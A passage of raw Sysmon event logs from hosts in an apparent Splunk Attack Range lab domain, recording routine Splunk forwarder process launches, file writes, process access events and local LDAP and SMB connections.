Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104078Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.515{58E9C193-B318-615A-E401-00000000FC01}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000104077Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.451{58E9C193-ACA5-615A-0B00-00000000FC01}628836C:\Windows\system32\lsass.exe{58E9C193-AC86-615A-0100-00000000FC01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30929|C:\Windows\system32\lsasrv.dll+2e287|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 354300x8000000000000000104076Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:58.268{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49574-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 354300x8000000000000000104075Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:53:58.268{58E9C193-ACB4-615A-2700-00000000FC01}2920C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local49574-true0:0:0:0:0:0:0:1win-dc-639.attackrange.local389ldap 23542300x800000000000000081998Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:00.170{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=977755B2A4ECDE51EE8CB141A698788E,SHA256=DA1297BE2A13B527024F2A5EAA62EB11B732E98CFDCE2C7B154DDCAFBAD4FA59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081997Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:00.170{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59A3999196021D6B10E2BE10AE5C3533,SHA256=2512519E051EA08D9C1CABF60B37DFBBE2C59A8D8FF1598B56387127B03C4CDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104093Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:01.702{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC8665F2A1928E5F9C70DCE0BA37930F,SHA256=5CE0AF8B44F2871047C7E69CFBA43EFAA2AED5618E9044E075E60462D861103A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082002Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:01.359{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D298ED5A934F59CDE406210A01079F40,SHA256=34B586EB4A6B9332814FF5C6CA33F416658AD9D6AEA832D2433786DDE61EE4D4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104092Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:01.373{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=2A2BB0839D07B663029957C4C78D6A58,SHA256=6400B3E56D4798E9459378E0C68118C706137E599E04435810B35F8E2C161578,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104091Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:01.373{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=5B9A4F3971B7541F5369EFBC8A8941BE,SHA256=44ED0A3325D72256CF877F22A054ED72CA7150E12C3C85D4323298ABFB70BD80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082001Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:01.205{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\respondent-20211004072621-026MD5=CD243B6FFA786E96F03F03FFF6EEA1F9,SHA256=BD72F37F00391F7EDFD796CB74D802386D2E764AAC9DEBCA5D4587784D6F99D6,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082000Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:53:58.739{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50067-false10.0.1.12-8000- 23542300x8000000000000000104109Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:02.717{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC579AE8C6B8A151BC37666AFAD75B16,SHA256=6C4EF8CF84B8C81F1D984B9DA4DF32BFE093B5F8456EA6CCF31CAA2595DABAE3,IMPHASH=00000000000000000000000000000000falsetrue 13241300x800000000000000082005Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-SetValue2021-10-04 07:54:02.828{2FDD8D40-AC9A-615A-1000-00000000FD01}960C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b8f4-0xff77a8d5) 23542300x800000000000000082004Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:02.373{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B26BA4FD164ABC170723753FAD9BC10,SHA256=87BBAECBCF4E9170E98F29F9A350D4E28B99FB49A21D715566F56B926DC9F262,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104108Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:02.405{58E9C193-B31A-615A-E501-00000000FC01}9446028C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000104107Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.693{58E9C193-AC86-615A-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49577-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local445microsoft-ds 354300x8000000000000000104106Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.693{58E9C193-AC86-615A-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49577-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local445microsoft-ds 354300x8000000000000000104105Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.595{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-639.attackrange.local49576-false10.0.1.14win-dc-639.attackrange.local389ldap 354300x8000000000000000104104Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.595{58E9C193-ACA7-615A-1100-00000000FC01}360C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local49576-false10.0.1.14win-dc-639.attackrange.local389ldap 354300x8000000000000000104103Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.587{58E9C193-ACA5-615A-0B00-00000000FC01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49575-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 354300x8000000000000000104102Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:00.587{58E9C193-ACA7-615A-1100-00000000FC01}360C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local49575-truefe80:0:0:0:9053:1d11:8ee:6c18win-dc-639.attackrange.local389ldap 10341000x8000000000000000104101Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:02.186{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B31A-615A-E501-00000000FC01}944C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104100Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:02.186{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104099Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:02.186{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104098Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:02.186{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B31A-615A-E501-00000000FC01}944C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104097Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:02.186{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104096Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:02.186{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104095Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:02.186{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B31A-615A-E501-00000000FC01}944C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104094Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:02.187{58E9C193-B31A-615A-E501-00000000FC01}944C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082003Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:54:02.219{2FDD8D40-AC9A-615A-1C00-00000000FD01}1896NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a5ffc3526a1e15c5\channels\health\surveyor-20211004072618-027MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000104129Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.858{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B31B-615A-E701-00000000FC01}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104128Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.858{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104127Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.858{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104126Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.858{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104125Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.858{58E9C193-ACA7-615A-0C00-00000000FC01}8403540C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000104124Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.858{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B31B-615A-E701-00000000FC01}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000104123Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.858{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B31B-615A-E701-00000000FC01}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000104122Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:54:03.858{58E9C193-B31B-615A-E701-00000000FC01}2564C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 